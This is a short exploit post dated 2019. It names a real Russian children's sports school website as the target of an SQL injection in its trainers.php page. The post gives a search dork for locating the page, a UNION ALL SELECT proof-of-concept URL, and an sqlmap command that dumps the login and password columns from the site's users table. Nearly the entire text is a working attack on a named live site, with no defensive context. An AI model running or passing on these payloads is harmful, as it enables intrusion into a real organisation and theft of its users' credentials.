[*] Exploit Title:МБОУДО СДЮСШОР № 7 «Акробат» SQL İnjection ----------------------------------------------------------------------------- Google Dork :intitle:МБОУДО СДЮСШОР № 7 «Акробат» trainers.php?id=3 ----------------------------------------------------------------------------- Date:15.05.2019 ----------------------------------------------------------------------------- Exploit Author:Cerkuday ----------------------------------------------------------------------------- [*] Tested on: Windows 10 / Kali Linux [*] Demo: http://www.acrobat-tlt.ru/trainers.php?id=3 Poc http://www.acrobat-tlt.ru/trainers.php?id=-6209' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7176767671,0x7353694e4867516746665161515a616f784d704b67676267566b68557550517462424c4569686566,0x7171787071),NULL-- RnQo sqlmap.py -u "http://www.acrobat-tlt.ru/trainers.php?id=3" --random-agent -D acrobattlt -T users -C login,password --dump